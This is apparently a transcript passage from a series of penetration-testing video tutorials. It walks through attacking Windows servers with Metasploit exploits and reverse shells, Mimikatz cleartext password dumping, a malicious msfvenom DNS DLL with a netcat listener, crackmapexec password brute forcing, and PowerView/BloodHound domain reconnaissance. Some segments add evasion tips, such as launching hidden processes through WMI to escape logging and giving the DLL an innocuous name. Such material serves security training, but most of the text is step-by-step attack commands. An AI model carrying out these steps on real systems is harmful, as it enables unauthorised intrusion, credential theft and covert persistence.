this field here, replacing the existing value, and try to run the exploit again, and then you might have more success. So those are some troubleshooting tips you can follow if the exploit doesn't work for you the first time. And if you were running your virtual machine on something other than VirtualBox, then you would modify the field under the appropriate code block. So look for example, if you're running on VMware 14, you would modify the groom base under the code block saying this address works on VMware 14. In this video, we're going to show how to leverage WMI on a Windows machine in order to harvest information and to further exploit an already compromised machine. So to start with, we are going to be using Kali Linux, and we're going to be using Metasploit. So I'm going to open up a terminal and launch Metasploit using the command msf console. And now we're running Metasploit. So our first task before we can leverage WMI is to establish a foothold on the target. And we want to do that by getting a reverse TCP connection to establish a Meterpreter shell, which will allow us to start to run commands on the target. So in order to do that, I'm going to use a module called exploit windows SMB ms17_010_psexec. And by default, without a payload configured, it will set up the payload as Windows Meterpreter Reverse TCP. So now I have my module loaded. We can take a look at what options we need to set for that module in Metasploit by using the command show options. And we see a lot of the options are already set for us, but what we need to set is the remote host field, which will be set to the target IP address, which is 192.168.2.11, which is in this case, we're going to set the SMB pass and SMB user. They're not required, but we're going to set it to some common credentials. So I'm going to set it to SMB user administrator, and I'm going to set the SMB pass to password 1. And these are just some common credentials that if the SMB server is poorly configured or has a weak password set, then I'll be able to use these credentials. And everything else can stay the same, and I'm going to run this exploit in order to try to get a foothold on the target. And our exploit is completed, and we can see we have successfully opened a Meterpreter session onto the target. So if I were to run an ls command, now I can see this is the output from the directory that I am currently in. And now we have our foothold on the target computer. So I'm going to drop into a regular shell, and in order to do that from a Meterpreter session, I use the command shell. And now I am on a regular shell on the target machine in the Windows System32 directory. So once again, I could use a dir command to see the listing, which will give me the same output as before. And now we're ready to start harvesting information and performing post-exploitation using the WMI service on Windows. Now, WMI is a fairly powerful tool on Windows, and it can be used for many different things. The first one that we're going to use is just to gain a little bit more information about our target. So now that I have a foothold, I want to know what kind of system am I running on. So in order to do that, I use the WMIC, which is the command line interface to WMI. So I use WMIC, and I'll use the first command will be computer system list full /format::list. And this will give me information about the computer system that I've got compromised. So now I find out information such as what kind of model it's running on. And so I can find out, oh, this is a virtual machine running on VirtualBox. So that gives me some more information about how I could potentially exploit this further in the future. I find information about the domain, and I can see it's just a local workgroup domain. So this all gives you information about the server that you have compromised. We could also use the command WMIC user account list and then /format::list and get information about the different user accounts. This is useful because if we have compromised credentials, we might be able to find out if our account will continue to use those credentials or if they're going to be changing. Because we can see for this account, in the bottom column, we see there's a password expires field, and it's set to false. So if that's the account that we've used to compromise, then we know that that password, unless it's manually changed, will always stay the same, so that we can fairly reliably count on that password being viable for us to use. And we can also use WMI for things beyond just information gathering. We can actually use WMI to launch processes. And the advantage to launching processes using WMI is that a lot of times WMI activities are not logged. You actually have to manually configure WMI logging on most Windows instances. So if that hasn't been done, it's a good way for an attacker to fly under the radar and to try to keep their activities being unknown. So for example, we could use something like WMIC path win32 process call create calc.exe. And what this will do is launch the calculator process on a Windows box, and we can see it's created a process with process ID 2072. And so if I go to task list, we can see our newly created calc.exe process running here in the bottom, and the output showing the process ID of 2072. But if I were to go over to the Windows machine which we have compromised, which is running right here, we can see that calculator.exe is not running visually for the user. So while the calculator program is running under the hood, there's no indication to anybody on the machine that something is happening. So that's a really nice feature from an attacker's point of view to try to stay unnoticed on a machine. WMI can also be used to perform these queries not just on the machine that it's running on, but it can also be used to query remote machines. So if there were other machines on the domain or other machines in the same network, then we could use these same commands to start getting information about other machines. And that can help us pivot through the network, exploiting further machines once we've gotten a foothold in this first one.
In this demo, we'll scan a Windows Server 2008 environment for potential vulnerabilities. All right, to get started, I've signed into Kali Linux. This is Kali Linux 2020.3. I also have a Server 2008 R2 machine running on the same subnet. To get started, what I'm going to do is I'm going to use Nmap for my port discovery. Nmap is an awesome tool. For example, you can perform host discovery, port discovery and enumeration, service discovery, OS version detection, service version detection, vulnerability and exploit detection, and we can also use Nmap script engine or NSE scripts. So my first command will be to enumerate the ports, to check for the ports that are open on my target. So for that, I'll type nmap-v for verbose -PN, which treats all hosts as online, skipping host discovery, and 192.168.1.86, which is the IP address of my target. So I'll go ahead and press enter. Okay, and now the results of my scan show that we have several open ports, including port 80 and 88, port 139, which is NetBIOS, 389 LDAP, 445, which is, of course, SMB, and a number of other ports, including 3306, which is MySQL, and 3389, which is Remote Desktop Protocol. Okay, so first I'll clear. Now, one of Nmap's most valuable features is the fact that you can expand its core features by using Nmap scripts. By combining some useful Nmap commands with some NSE scripts, we may be able to uncover some of the common vulnerabilities and exploits from a target. So on Kali Linux, you'll find the scripts in the user share nmap scripts directory. So let's have a quick look there. So in Kali Linux, I'll click to open File Manager. And we want to go to File System, User, Share, Nmap, Scripts. So these are all the NSE scripts that come with Nmap. We can quickly and easily use the vuln, that's VULN, NSE script category to detect CVE information about a target. And this basically turns Nmap into a vulnerability scan engine. Okay, so let's go back to terminal session. Understand that NSE scripts are organized based on predefined categories, including auth, that's AUTH, denial of service or DOS, exploit, malware, vuln, that's VULN, and others. Vuln is the category that we'll use to launch our scan against the target. The Nmap option -S capital V enables version detection per service to further enhance detection of potential vulnerabilities. So let's go ahead and do that. Now, to use the vuln script, or to use any scripts, I need to run as sudo. So for this command, I'll type sudo nmap -S capital V. Again, that enables version detection of services. -V for verbose, -capital PN, which treats all hosts as online, skipping host discovery. I specify a script by first issuing the flag --script, then I specify the flag category, which in this case is VULN, vuln for vulnerabilities, and the IP address of the target. So let's go ahead and press enter. I'll enter the Kali password and press enter. Now this can take a couple of minutes, so you may have to wait a couple of minutes. It depends on how many machines that you're scanning as well, and how deep your scanning is going to be, how many ports are open, and so on. So what I will do is I will fast forward this, and we'll talk about the output from the vulnerability scan. Okay, so let's see what we've got. Let's scroll all the way back up to the top. Now, as usual, there will be some closed ports, but you can also see from the output that there are a couple of different vulnerabilities that have been exposed, and some that aren't a concern. So for example, for port 80, we see that there are no stored cross-site scripting vulnerabilities and so on. Okay, scrolling down, now we see some vulnerabilities. And these vulnerabilities are listed based on the vulnerability CVE or the Microsoft Security Bulletin. So for example, we see that we have some remote desktop protocol vulnerabilities. And these are both related with MS12-020. One's a denial of service vulnerability, and the other is a remote code execution vulnerability. So we have vulnerabilities with remote desktop protocol. Now scrolling down, again, we see some scripts that failed execution. Okay, then we see another vulnerability. Okay, and this vulnerability has to do with SMB. Okay, so that's it. We've successfully scanned a Server 2008 environment for potential vulnerabilities. In this demo, we'll enumerate data from services running on Windows Server 2008 hosts. All right, to get started, I've signed into Kali Linux. This is Kali Linux 2020.3. First, I'm going to use NBT scan. I'll use NBT scan because I can discover the Windows or Samba servers on the subnet. I can get Windows MAC addresses, net BIOS names, and discover the workgroup or domain that the target is in. Okay, so let's go ahead and get started. So for this, I'll type NBT scan 192.168.1.86, which is the IP address of the target. Okay, so let's go ahead and press enter. All right, so we see that the net BIOS name for our target is Server 2008 R2. The user, we don't have user information, but we also have the MAC address here. Okay, so that's provided us with some limited use. So first, let's clear. And now we'll use Nmap to probe open ports and determine the service and version information for these different ports on the target. So for this, I'll type nmap-v-s capital V and IP address for the target. Now -v means verbose, -s capital V means to probe the open ports to determine service, and version information. Okay, and in the results, not only can we see the port, the state of the port, and the service, but we can also see the service version. So for example, we have for the domain, Microsoft DNS 6.1.7601. We have IIS running HTTPD 7.5, Kerberos, RPC, we've got NetBIOS info, we've got the Active Directory information. We also discovered that we've got MySQL 5.5.14 running on this system. Okay, so we've got some good information here. Okay, so let's clear. Now let's use Nmap, and we'll use the -A flag to enable OS detection, version detection, and script scanning and traceroute. So let's go ahead and do this. So I'll type Nmap-P 445-A and the target IP address. Now, -P is just the port, right? So we're interested in port 445 because we know there's a couple of excellent exploits for SMB related to Server 2008. All right, so this gives us some really detailed information about SMB. Okay, so we can see, for example, that the SMB security mode is 2.02. Okay, so we've got some deep information about SMB on this machine. So now let's clear. And now let's use enum for Linux. Enum for Linux is a tool for enumerating information from Windows and Samba systems. It's written in Perl and is basically a wrapper around Samba tools SMB client, RPC client, net, and NMB lookup. Now, for this command, we can use the -A flag, and that will run all simple enumerations, including the user list, the password policy, group information, share list, enumerating users via RID cycling, getting the OS information, printer information, and it also performs an NMB lookup, similar to MBTstat. Okay, so let's go ahead and do this. So that's enum for Linux, -A. I'll use -U because I know the credentials of an administrator on this system, and -P for password, so I'll just specify the password for this user, and the IP address of the target, of course. Now, the only downside to running enum for Linux with the -A flag is that you get a bunch of information that you really don't need, that's not going to be useful to us at this point, right? So if I scroll all the way up, though, to the very top of the output from the enum for Linux command, I'll see that I do have a lot of useful information about users, about groups, about the domain itself, the machine, the ports, all of this information. We can also get, for example, information about the different drives and share information. All in all, a lot of information here as well. All right, so we've successfully enumerated service information from a Server 2008 system. In this demo, we'll run an exploit on a Windows Server 2008 based machine to gain user credentials. First, a little bit of background on how we're going to exploit the Server 2008 based machine. We're going to use digest authentication. Now, this is a challenge response protocol used primarily in legacy systems like Windows Server 2003 for LDAP and web-based authentication. Digest authentication uses HTTP and simple authentication security layer exchanges in order to authenticate. Essentially, a client requests access to something, the server performing the authentication challenges the client, and the client responds by encrypting its response with a key generated from the password. At this point, the encrypted response is compared to the response stored on the authenticating server. And here's where the problem happens. An attacker with access to an endpoint and the ability to run a tool remotely, like Mimikatz, would not only obtain the hashes stored in memory, but they would also be rewarded with the clear text passwords that are stored in memory. Out of the box, Server 2008 variants are vulnerable to this type of attack. Pretty scary situation, right? So in this demo, let's check out what an attacker would see when dumping credentials in memory with a tool like Mimikatz. So I've signed into my Server 2008 R2 machine. To get started, I'll open PowerShell. So down on the taskbar, I'll click the PowerShell icon to open PowerShell. Okay, so I've already downloaded Mimikatz on this machine. What I'll do is I'll navigate to the directory where my mimikatz.exe executable is located. So I'll type cd downloads /mimikatz/x64, and I'm using the tab key to autocomplete here. Okay, now clear. And now let's run Mimikatz. So I'll start typing Mimikatz, and then I'll autocomplete with the tab key. Okay, so now running Mimikatz, I'm at the Mimikatz command prompt. Okay, so now let's escalate privilege to debug. So for that, I'll type privilege : debug. Okay, and we're good. Now I'll type secure LSA : logon passwords. Okay, so let's scroll back all the way up to the top. Okay, now scrolling down until I locate the session that I'm interested in. Now have a look at the W digest. So not only do we see the username and the domain, we also see the clear text password. In this demo, what happened is the username Joe opened a remote desktop session from another machine, and since wdigest is configured insecurely, not only is the attacker able to see the NTLM hashes for Joe's account, but even as evidenced here, the clear text password. Okay, so we've successfully run an exploit on a Windows Server 2008 based machine to gain user credentials. In this demo, we'll exploit a system to obtain a reverse shell for a Windows machine. In this demo, we want to exploit a remote code execution vulnerability, which effectively allows us to remotely execute any system command. There are several Windows commands that enable us to use the target machine to deliver us a reverse connection, including mshta.exe, run dll32.exe, regserve32.exe, certutil.exe, powershell.exe, msiexec.exe, and wmic.exe. mshta.exe is what we're going to use in this demo, and this is a component of the Microsoft HTML application host. This is a Windows operating system utility that runs HTA files or HTML application files. These HTA files are HTML files that we can use to run JavaScript or VB script. Metasploit includes an HTA web server module, which we can use to generate a malicious HTA file. This module works by hosting an HTML application that, when opened, will run the malicious payload. We'll use PowerShell to invoke mshta.exe and tell it to run the file we generate with the HTA web server module from Metasploit. So let's get going. We'll need the IP address of the Kali Linux machine. So I'll just type IPA. And ETH0 reports 192.168.1.88 as the IP address. Okay, so let's clear. Okay, so first we'll start Metasploit. So I'll type msf console. Okay, and now I'll clear. We want to use the Windows HTA server exploit. So I'll type use exploit/windows/misc/HTA_server. Okay, and we have a default meterpreter reverse TCP payload. So next we want to set the server host, and that will be the Kali Linux IP address. So I'll type set srv host 192.168.1.88. Okay, now I also have to set the local host to the same. So I'll type set lhost 192.168.1.88. Okay, and now I'll type exploit. Okay, and it reports that the server is running, and so we have our URL. Now we'll copy this URL. So I'll highlight, right-click, and select Copy Selection. And now I'll go over to the victim machine, which is a Windows Server 2008 R2 machine. Okay, so now I'm over on my Windows Server 2008 R2 machine. Down on the taskbar, I'll click the PowerShell icon to start Windows PowerShell. Okay, so now that the server is running on the Kali Linux machine, we can run the malicious code using mshta.exe on this victim machine because it's vulnerable to remote code execution. And what we'll get is a meterpreter session back on Kali Linux. Okay, so let's go ahead and do that. So I'll type mshta.exe and space, and now I'll right mouse click to paste the URL in, and now press enter. So now let's go back over to Kali Linux. Okay, over on my Kali Linux machine, the meterpreter session 1 has been started. So let's go ahead and run session 1. So I'll press enter, and now I'll type sessions 1, I'll press enter, and now I've got a reverse shell from the victim machine. And to prove that, I'll type sysinfo. And there we see the computer listed as Server 2008 R2. So we've successfully exploited a system to gain a reverse shell on a Windows machine.
In this demo, we'll exploit a third-party application and gain access to a system. Okay, to get started, let's do an Nmap scan of the target, and we'll use the -S flag to probe open ports for service and version information. So I'll type nmap-S and the IP address of our target is 192.168.1.90. Okay, so pressing enter, Nmap starts. So from the Nmap output, port 8080 is open for HTTP traffic for Apache Tomcat. Now we also know that the default for Tomcat Manager's URL is going to be the root/manager/HTML. So let's open a web browser and let's see what we get with the manager/HTML route. Okay, so up on the toolbar, I'll click the Kali icon to open the menu, and then I'll select the web browser. I'll maximize my browser window. And now for the URL, I'll type 192.168.1.90, the port 8080, so that's :8080/manager/HTML. Okay, and we get an authentication challenge to log into Tomcat Manager. So now we'll press OK twice with no credentials. And we'll get a 401 unauthorized page. And we can see some information on this page. Now, although this is not necessarily going to be the username and password, if Tomcat Manager is incorrectly configured to use these values, then we'll easily be able to log in. Okay, so let's go ahead and try that. Let's refresh. Let's try Tomcat and S3 crit. And that works. So we're in. Okay, so there are a number of ways now that we can take advantage of this. Okay, so now we can up our game a little bit. Now that we know this is actually the Tomcat Manager username and password, we can use the Tomcat Manager Authenticated Upload Code Execution module in Metasploit. Okay, so let's go back over to Kali Terminal. So first I'll clear. And now, as I said, we'll use the Tomcat Manager Authenticated Upload Code Execution module. And it can be used to execute a payload on Apache Tomcat servers that have an exposed manager application like we just saw. The payload is uploaded as a WAR archive that contains a Java Server Pages application using a POST request to the manager HTML upload. Okay, so let's go ahead and we'll start Metasploit console. So I'll type msf console. Okay, now I'll clear. And now we'll need to use the correct exploit. So I'll type use exploit /multi/http/tomcat_mgr_upload and press enter. All right, and as indicated from the output, no payload was configured, so it's defaulting to Java meterpreter reverse underscore TCP, which is exactly what we want anyway. Okay, so now we have to set the remote host, port, the username, and password. So first we'll clear. And now to set the remote host, I'll type set our host 192.168.1.90. Okay, now I'll set the remote port. So I'll type set our port 8080. Now the HTTP username. So I'll type set HTTP username Tomcat. And now the HTTP password. So I'll type set HTTP password S3crypt. Okay, now let's type show options to see what we've got. Okay, and we have the HTTP password, username, the host, the port, everything's good. All right, so let's go ahead and we'll clear. And now I'll type exploit. Okay, and now we have a meterpreter session. So let's check this out. Have we actually got a meterpreter session on the remote machine? So I'll type sysinfo. So this indeed is a meterpreter session of our target. So we've managed to exploit the Apache Tomcat third-party application to gain access to this system.
Okay, so I'm going to set up the scenario here. I have my Kali machine open. I've already exploited a remote machine, and I'm logged in as a local user. So if I just go into my interpreter session here and type in get UID, GET-UID, and press enter, you can see I'm logged in as the IIS apppool/web user. So this user does not have any real advanced permissions. This is just a basic user account. I want to get system access to this machine so that I can do some actual damage, or so that I can gain access to system files to pivot to another machine. So in order to do this, I need to elevate my permissions. So the first thing I'm going to do is I'm going to hold down Control and hit the letter Z. And this is just going to background this session. Now we see where it says background session 2. We need to keep that in our mind because we're going to use that later. We're going to use session 2 in order to run the next exploit. So now that that's backgrounded, I'm going to type in use space post /multi /recon /local exploit, and I'm just going to hit tab to finish the completion here. So this is going to use the local exploit suggester on this machine. So now I need to set the session to the session that we just had. So this is session 2, and then we type in exploit, exploit, and you press enter to run. Now this is going to look at the remote machine using that backgrounded session, and it's going to see what local exploits may work against it. So I'm just going to pause the video and we can come back once this is done. Okay, so the local exploit suggester has finished running here, and it gives us a list of different exploits that are vulnerable on this machine. So I'm going to just scroll up and show you all the different exploits that it found. So it found local bypass UAC event viewer, ms10_015_kitrapod, and that's going to be the one that we're going to use to exploit this actual machine. We have SHE elevator, SHL ampery, all of these different exploits. You can go and take a look at the MS13_018 or MS14_058. You can take these codes and you can go look them up on a different website called ExploitDB. And this website's going to give you what that exploit is, and it also often will give you a Python script or a specific script that you can run in order to do this. Now, these exploits all exist within the Metasploit framework already, which is perfect. And as we can see, there's quite a few of them that exist on this machine that supposedly we might be able to run against it. Wherever it says the target appears to be vulnerable, chances are that exploit will work against that remote machine. So I'm going to use the Metropod or the Kitrapod exploit here. So I'm going to type in use space exploit /windows/local /ms10_015_kitrapod. KITRAP0D. Tab completion does work here, so as you're typing it in, you can hit tab to complete each section. And hit enter. I'm just going to type in options and see what options we have for this specific exploit. So I see here we have session, so I want to set session to 2 because that was the session that we had. And let's just make sure that exploit was set. I don't see the full options here, but I need to set my lhost to my IP address because I have more than one network card. And I need to set the L port to something different because I'm using port 4444 for my main attack. Here I'm going to use 4455. So set L port to 4455. I'm going to hit enter and options again. So we have session 2. It's going to run against Windows 2 KSP4, Windows 7, x86. And I'm just going to type in exploit and hit enter. And this is going to run. And we can see that no session was created. But if I look, it started the reverse TCP handler on the wrong IP address. So this is an issue that you'll run into if you have more than one network card on a Kali machine, especially if you're running it in a virtual machine where I have a couple of different network adapters. So this time when I run options, I have the lhost function there. So I'm going to go set lhost 10.10.14.14, which is my IP. Options again, and I can see it's set, and now let's run the exploit. And it's going to inject, payload's complete, and I have a new interpreter session on that remote machine. So let's type in get UID, and there we go. I have escalated my privileges. I am now the root of this machine. If I type in ls, I can see I have all the different Windows, or all the different IIS files here. I'm currently logged into Windows System 32 iNet SRV, and this is great. I now have shell access to this machine as a root user, which means I have complete control of this box. So now I have the options where I can set up an advanced persistent threat. I may decide to take punitive action against this machine. I may want to knock it offline, and I can do that. Or I may want to pivot to another machine so I can search everywhere on this machine for information and then look to pivot to another machine. I'm going to set this up for you really quick. So what has happened is I have gained access to a Windows-based machine as the user Ryan. Now Ryan has some privileges on the domain, but not all the domain privileges that I want. My goal here is to get root on this system. So I need to get that. And in order to do that, I'm going to do what's called a DLL injection to accomplish that task. So the first thing I'm going to do is I'm going to type in who am I /all and hit enter. And this is going to give me all the information for this user, for Ryan. Now if I go up, I can see that Ryan is part of the group called DNS admins. He's also part of the remote management users group. So this means that Ryan has some level of access to the domain that a typical user wouldn't. So one, he is part of the remote users group, so chances are he's going to be able to remote into most machines on this network, which is fantastic because Windows RDP access is a heck of a lot better than shell access, especially if that's what you're used to as an administrator or as a user. Additionally, where he has that DNS admin level privileges, he can actually manipulate the DNS service that's running on this machine. The great thing about the DNS service that's running on this machine is that it is susceptible to a DLL injection. So what I'm going to do here is first I'm going to open up a new tab. So in the top left, click File, and then select New Tab, or hold down Control-Shift and hit the letter T. This should open up a new location. Now I'm on my desktop. I'm just going to type in ls and hit enter. So I do have a DLL there, but that's not the DLL that I want to use for this exercise. It was a DLL I used for another exercise. So I'm going to type in msf venom space -a space x64 space -p space windows /x64 /shell _ reverse _ TCP space lhost equals, and this is where I'm going to put in my IP address, 10.10.14.14, lport equals, and I'm going to pick a port. In this case, I want 4444 space -f space DLL. So what I'm doing is I'm running the MSF Venom. So I'm going to create a payload. I'm going to do it using 64-bit architecture, using the 64-bit shell reverse TCP option, and I'm going to put this output as a DLL. So I'm going to output that to, let's call it DNS.DLL, because that's going to be very hard for an administrator to track down. They're going to see DNS.DLL. Chances are they're not going to think twice about that. They might, but it's very rare that you look that deep into stuff. Typically, you're looking for stuff that really looks out of place at first when you're doing any type of investigation of this stuff. So I'm going to hit enter, and this is going to generate this payload for me. So while this runs, but what I tend to do while this is running is I open up a new tab, and I'm going to type in nc space -nvlp space 4444. So what I'm doing is I'm setting up my netcat listener that's going to listen on that port that payload has been set up to execute on. So if we go back to that second tab, I can see that I specified lport as 4444, and if I go back to the third tab at the top, I can see that it's listening on port 4444. So this is perfect. I'm now set up so that anything that connects into my machine on that port, with executing that reverse TCP shell command, it's going to give me netcat access. So the next step I need to do is I need to set up an SMB server. Sudo space python space /user /share /doc /python -impacket /examples /SMB server.py space share space /root /desktop. So what this is doing is this is using the Impacket suite of tools. It's using the SMB server.py to create a share, an SMB share on this machine that's going to allow anyone to authenticate it. So I'm going to press enter. And now I can see that I have this running. So I can see callback added for the 2 user IDs and the config file parsed. This is perfect. So if I go back to the first tab where I have my evil-winrm command line open, I'm essentially running PowerShell as this Ryan user. What I need to do is I need to actually register that DLL to the DNS server. So I'm going to do DNS cmd.exe space, and wait a minute, there's a piece of information here that I don't know. I don't know what this local machine's IP address is, so I'm just going to backspace this out and type in ipconfig and hit enter. And I can see it's 10.10.10.169. So now I'm going to type in DNS cmd.exe space 10.10.10.169, which is the IP address of the remote server that I want to get access to, /config, because I'm configuring the DNS server, /server level plugin DLL. So this is going to set the server plugin DLL, so essentially the DLL that executes when you start or stop the service. And we're going to point it to that share that I've set up, 10.10.14.14 /share /DNS.DLL. So if I just click on a new tab real quick, or if I hit Control-Shift-T and I type in ls and hit enter, I can see the DNS.DLL is there. So if I click back to the first tab, when I go to execute this command, it should pull that share file from the remote server. So I'm going to press enter. So this says that the registry property, server level plugin DLL, has been successfully reset. So now let's start and stop DNS. sc.exe space stop space DNS, sc.exe space start space DNS, and hit enter. So that just stopped and started the DNS service. So now if I click on the second tab, I can see on my SMB server that this user had actually gone and authenticated to my SMB server and grabbed the file. This is perfect. This is what I want to see. This means that my DLL injection, at least to the part of executing the command, is working. Now if I click over onto the next tab over, I can see that my netcat listener picked up a connection. So this is really good. So if I type in who am I, I'm now logged in as the NT authority /system. So I now have root access to this machine because the DNS service runs as the NT authority /system user. So by injecting a DLL and restarting the service, I was able to gain this level of access to the remote machine. So I have a Windows machine that I want to try to gain access to. Now, I've already run the Nmap scan against this machine so that we don't have to wait for it to run. And I can see here that I have a couple of services running here. Port 53 is DNS, so that's a good start. I know DNS is running. But I also see ports 139 and 445 are there. And that indicates to me that SMB is running on this machine. And SMB is going to typically be the first service that I look at exploiting on a machine, because chances are that SMB service is going to have some vulnerabilities for it. SMB just has too many different vulnerabilities over the ages, and if this is any type of older machine, chances are I'm going to find some information from the SMB service that I'm going to be able to use in my attack. So what I want to do here is I want to show a tool called Nmap. Now this is what I'm going to use in order to gain user privileges on this machine, and I'm going to do it through brute forcing. So I'm going to run crackmap space SMB to indicate the SMB service, though you can use RPC as well. There's a bunch of different services you can use with crackmap -u, and I'm going to leave this blank in quotation marks and -p blanks in quotation marks, and then the -- users. So what I'm doing is I'm authenticating over SMB anonymously, and I'm going to try to query the service that's running on this machine to get a list of users that are on this machine. So when I hit enter, it's going to run that crackmap script, and it's going to come back, and here we go. I have a bunch of outputs. So I'm just going to scroll up to the top. And here it was able to enumerate some domain users. So we have a administrator, we have a guest, we have the KRB TGT service, we have a bunch of mailboxes, it looks like, and then we have Sebastian, Lucinda, Alfresco, Andy, Mark, and Santi. So what I would do in this case now, I have a list of users, so I need to build a user's account. So I can see Lucinda, Alfresco, Andy, Mark, and Santi, and I've already created this on the desktop, but just to output it, I'm going to do cat space users.text and hit enter, and that's going to output the list of users. So you can see I put the 6 users accounts in there. That's perfect. So now what I want to do is I want to essentially brute force these users in order to gain access to this machine. Now, I can do this on a per user basis, so I could do crackmap space SMB space the IP of the machine -u, and let's just go with administrator, and then -p, and I will use user/share/wordlists/rocku.text. I'm just going to hit enter, and I'm going to let this run for a couple seconds just so you can see what it's doing. And it's going to try everything in rocku.text. I'm just going to hit Control-C to exit out of this. Perfect. What it did was it ran the rocku.text file against that user account. And it will just run and run and run until it either exhausts all the different passwords in that list or until it gets a positive. But I want to run it on multiple users. Now this is great, especially if you have a lot of time that you can use to run your attack. So let's say I've gained access to a SMB server remotely. That SMB server is running. It's very late in the night. I know there's no IT resources that have their eyes on this. I found 7 or 8 user accounts that exist on that local machine. So now what I want to do is run that word list to try to see if I can get the password out of one of these user accounts. So the next step is for me to run this script, but running it across all users. Now I'm going to use a custom word list here that has the password in it, down quite a few in the list, so it will show you what it runs like. But this is a great way if you need a user account in a pinch and you have the ability to spend some time to just let the script run, go get a cup of coffee, come back, see how it's doing in an hour or two. So here I'm going to run crackmap exec space SMB space 10.10.10.161 space -u space users.text space -p space /root /desktop /wordlist.txt. So this is going to run my word list that I've created against users.txt file. This is also a great utility if you've found a shared password on a machine. To give a quick example of this working in the real world, I was doing a penetration test. I did some social intelligence gathering, and I was able to determine what the default password was the organization used. It was the organization's name, followed by the number 1 and then the pound sign. So in order to use that, I can use crackmap exec along with the user list and that password, and it will check every user for that password on the domain. And sure enough, that password existed for a couple of users on the domain that hadn't logged in since that password had been reset. Also, administrators tend to be human beings. You know, I'm an administrator myself. I'll admit there's a few machines that I use shared passwords on. I'm not supposed to, it's not best practice, but in reality, that's what you get. So if you were to run this on my domain and you knew that specific shared password, you would find multiple places where this was run. So here I have crackmap exec. I'm running against the SMB service, and you'll run against those users and the wordlist.txt. So let's press enter. And we can see here it's going to scan through each user. It's going through Sebastian now Lucinda, and then it's going to get to Alfresco, and then it's going to halt because we finally got a success. So this stops once it has a success, and I know that the username for SVC Alfresco, the password is service. So I can now log into that machine with that user account, or I can use that user account to enumerate more information from this machine. So I'm set up and I'm logged into a remote machine using evil-winrm as svc-alfresco. I'm currently sitting in the documents folder, so if I type in dir and press enter, you can see that there's no files here. So what I want to showcase is some of the commands you can use with PowerView, and I'm really only going to scratch the surface of what you can do with this utility. This PowerShell script is incredible. It allows you to actually search for users across the domain, so you can find out other systems that a specific user is logged into, which will allow you to pivot to other machines within the domain quite easily. So I'm logged in, but I want to actually transfer a file up to the documents folder. So I'm going to click on File. I'm going to go to New Tab. And here, if I just type in ls and press enter, you can see that on my desktop folder, I have a PowerView.ps1 file. This is the file I want to transfer up to the remote machine. So in order to do this, I'm going to type in sudo space python space -m simple http server space 80. Now 80 indicates the port that I want to open the HTTP server on. And when I hit enter, it's going to open up a server. Now it's going to start serving the desktop because that's the folder I'm in. So if I minimize this for a second, and if I open up Firefox, and when I'm into Firefox here, I can just go to the website 10.10.14.14, which is my IP address. And here I can see PowerView.ps1 is listed. So let's just close that off and go back to the terminal. And we can see here where I connected to the machine that it actually gave a code 404 message not found. It was looking for the favicon.ico, which doesn't exist. So if I go back over to the evil-winrm tab, which is the first tab at the top, I'm going to type in a command here. Now I am going to copy and paste it from an external source, but it's invoke-web request space minus URI space, and then in quotations the URL of the file that you want to grab space minus out file space, and then the location on the remote machine where I want to store it. So in this case I want to put it in the documents folder, and I want to call it PowerView.ps1. So when I hit enter here, this is going to go to the next line. There's no error message, and if I click on that second tab, I can see where 10.10.10.161, the remote host, got PowerView.ps1, HTTP 200, which means that request was fulfilled. Now if I type in dir and press enter, I can see PowerView.ps1 has been uploaded to this machine. So now that we have PowerView up on the machine, I need to run it. So I'm going to type in import-module space and then c/user/svc-l fresco /documents/PowerView.ps1, and I'm going to press enter, and that's going to import the module so that I can use it. Now I can use the PowerView command utilities. Now Harmjoy has several different blog posts on his website on different uses for PowerView, and I highly recommend anyone check it out because this is a fantastic source, not just for offensive security, but for defensive security as well. What you can do now is, for example, I can type in get-domain policy, and this is a PowerView command, and when I hit enter, it's going to go and it's going to fetch some information from that local machine, from that domain controller. It's going to tell me that the minimum password age is 1, so you can reuse passwords after 42 attempts. Password length is 7, password complexity is 0, so password complexity is not turned on. Password history size 24, so you can store 24 passwords. And we have clear text password is set to 0, so unfortunately this domain isn't storing them within clear text. And then we have a maximum ticket age, max renew age. And we have a bunch of information here that I can use myself that might be useful down the road. So if I wanted to create, say, a dictionary file for doing attacks against this system, I know that password complexity is turned off, and the minimum password length should be around 7 characters, so I'm going to go and try to search for passwords that are anywhere from 1 to 7 characters in length. Typically, I might do 8 or 9, but usually people tend to stick specifically to the minimum password requirements required on the domain. Additionally here, I'm going to type in get-net user, and I'm going to press enter, and this is going to query the domain for every user account that exists. So if I look up here, I have Santi Rodriguez, and I can actually see where this individual sits within Active Directory. I can see that it's a user object. If I keep scrolling up here, I can see the object SID for this user, so if I see that SID referenced anywhere, I can grab that user's credentials. This information is very valuable because I now can take a look across every user on the domain. Mark Brandt here, he's within the OU of Systems Admins, Information Technology, he's a user object. Chances are this is an account that I might want to take down that is going to have some advanced permissions. Once again, if I continue up, I can see this is just a standard user account, and if we keep going up, you'll see SVC Alfresco, which has password set to not expire. And if I keep going up, I can see Lucinda Berger and all the other user accounts and mailbox directories that exist on this server. So this is only scratching the surface of what you can do with PowerView. Once you have it loaded onto a machine, you can really use this to help pivot to other machines because you can scan them to see what users have been logged in. So I have shell access to the remote machine using EvilWinRM. I'm logged in as a user account who appears to have some privileges on the domain, but not enough to be a domain admin or an administrator. So I need to figure out how to get there. And what I'm going to do here is I'm going to run a tool called Bloodhound, and I'll show you what it can do. So here I'm going to first run sharphound.ps1. So I've already uploaded it to this machine, and I'm just going to import the module. I'm going to copy and paste this because it is case sensitive. So it's import dash module space c slash users slash svc alfresco slash documents slash sharphound.ps1. When I hit enter, I can see that it's gone to the next line. So I want to actually invoke the Bloodhound command now. So to do this, once again, I'm going to paste in the command. So it's invoke dash Bloodhound. So Sharphound has a command in it called invoke Bloodhound dash collection method all dash JSON folder, and then I'm outputting this back to my documents folder. I'm just going to hit enter, and this is going to run for a second. So what this does is this goes out and collects all information about all domain users and all their SIDs and all their relationships and all access that they have on the domain. So now if I type in dir, I can see I have a bloodhound.zip file here. I've now generated 3 of them because I've done a couple test runs of this already. So I want to download one of them. So the great thing about EvilWinRM is you do have a download command in here. So I can type in download space, and I have to use the full path to the file. So C users svc alfresco documents, and then 2021 2011 71253 underscore bloodhound.zip. I'm going to hit enter, and it's going to download here. Its progress is at 100%. Perfect. It's now complete. So now let's load up Bloodhound. So I'm click File and go to New tab. And here what I need to do first is I need to start the database. So neo4j space start. And this is going to start the neo4j service, which is the database. And since it's already running, perfect. And now I'm going to launch Bloodhound. I'm going to type in BLOODHOUND, Bloodhound, and hit enter. And this is going to launch the Bloodhound application. Now it's going to ask me to log in. If you have your Neo4j set up and you've already 